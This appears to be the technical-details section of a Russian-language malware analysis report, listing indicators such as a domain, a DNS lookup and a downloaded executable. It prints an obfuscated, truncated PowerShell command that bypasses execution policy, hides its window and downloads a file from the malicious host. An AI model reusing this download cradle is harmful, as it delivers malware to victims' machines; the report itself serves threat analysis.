Техническая информация
- http://travelsserts.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOwERShelL.EX^E -^e^XEC^utioN^pO^LIc^y ^ByPAsS ^-N^oPRoFILE ^-W^iN^d^o^W^s^tyle ^H^Idde^N^ (^n^Ew-o^BJ^Ec^T^ sys^TeM^.NE^t^.W^eb^Cl^IEn^t)^.dOWNlOad^F^I^LE^('http://trav...
- DNS ASK tr####sserts.wang
- '<SYSTEM32>\cmd.exe' /c "pOwERShelL.EX^E -^e^XEC^utioN^pO^LIc^y ^ByPAsS ^-N^oPRoFILE ^-W^iN^d^o^W^s^tyle ^H^Idde^N^ (^n^Ew-o^BJ^Ec^T^ sys^TeM^.NE^t^.W^eb^Cl^IEn^t)^.dOWNlOad^F^I^LE^('http://trav...' (со скрытым окном)